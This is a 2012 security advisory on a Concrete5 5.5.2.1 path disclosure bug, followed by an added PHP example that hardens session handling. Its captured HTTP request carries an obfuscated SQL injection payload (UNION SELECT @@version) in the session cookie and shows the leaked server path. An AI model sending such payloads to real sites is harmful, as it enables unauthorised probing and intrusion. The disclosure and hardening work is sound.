[ TITLE ....... ][ Concrete5.5.2.1 CMS information disclosure bug
[ DATE ........ ][ 22.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ -----------------------------------------------------------------------
[
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is the bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?

This is a very nice CMS, you should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?

Information disclosure bug (the server's filesystem path leaks through a PHP warning).

[--------------------------------------------[
[ 3. Where is the bug :)

(...raw cut from Burp...)

GET /concrete5.5.2.1/index.php/search/?search_paths%5B%5D=&query=aaaaaaaaaaaa&submit=Search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (...)
Referer: http://concrete-host/concrete5.5.2.1/index.php/search/
Cookie: CONCRETE5=%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d0%2f%2a%2a%2fUNION%2f%2a%2a%2fALL%2f%2a%2a%2fSELECT%2f%2a%2a%2f@@version,%2f%2a%2a%2f2--; (...)=(...); PHPSESSID=phpsessid
Connection: close

(...end cut...)

Hm :) So the answer is (for a vulnerable php.ini, of course):

"
Warning: session_start() [function.session-start]: The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /www/concrete5.5.2.1/concrete/startup/session.php on line 32
(...)
"

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
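A hardened session bootstrap for the bug shown in section 3, added here as an example (it is not Concrete5's own code and not from the advisory's author). It assumes PHP 7 or later, a session cookie named PHPSESSID as in the captured request, and that the "vulnerable php.ini" is one with display_errors enabled. The idea is twofold: never let PHP warnings reach the response body, and reject a session id that does not match the character rule PHP itself states in the quoted warning before session_start() ever sees it.

```php
<?php
// Added example (not Concrete5 code): refuse malformed session ids before
// session_start() can emit the warning quoted in section 3, and keep PHP
// from printing warnings (with the server path) into the response at all.
// Assumptions: PHP 7+, cookie name PHPSESSID, character rule from PHP's
// own warning text: a-z, A-Z, 0-9, ',' and '-'.

// 1. The path leaks only because display_errors is on. Log errors instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Accept only ids PHP would accept, and bound the length (PHP's own limit is 128).
function is_valid_session_id(string $id): bool
{
    return preg_match('/^[A-Za-z0-9,-]{1,128}$/', $id) === 1;
}

// 3. If the cookie is missing or malformed, drop it and start a fresh session.
function start_session_safely(string $cookieName = 'PHPSESSID'): void
{
    session_name($cookieName);
    $incoming = $_COOKIE[$cookieName] ?? '';

    if ($incoming !== '' && !is_valid_session_id($incoming)) {
        // Worth logging for detection: a malformed id is a probe far more often
        // than a real browser. Log the length, not the raw value.
        error_log(sprintf(
            'Rejected malformed session id from %s (%d bytes)',
            $_SERVER['REMOTE_ADDR'] ?? 'unknown',
            strlen($incoming)
        ));
        unset($_COOKIE[$cookieName]);
        // Force a fresh id from the allowed charset so PHP ignores the bad cookie.
        session_id(bin2hex(random_bytes(16)));
    }

    session_start();
}

start_session_safely();
```

Include this before any other session use (in Concrete5's case, the startup code the warning points at). On PHP 5.5.2 and later, session.use_strict_mode=1 in php.ini additionally makes PHP discard any session id it did not generate itself, which closes the same class of cookie tampering without application code.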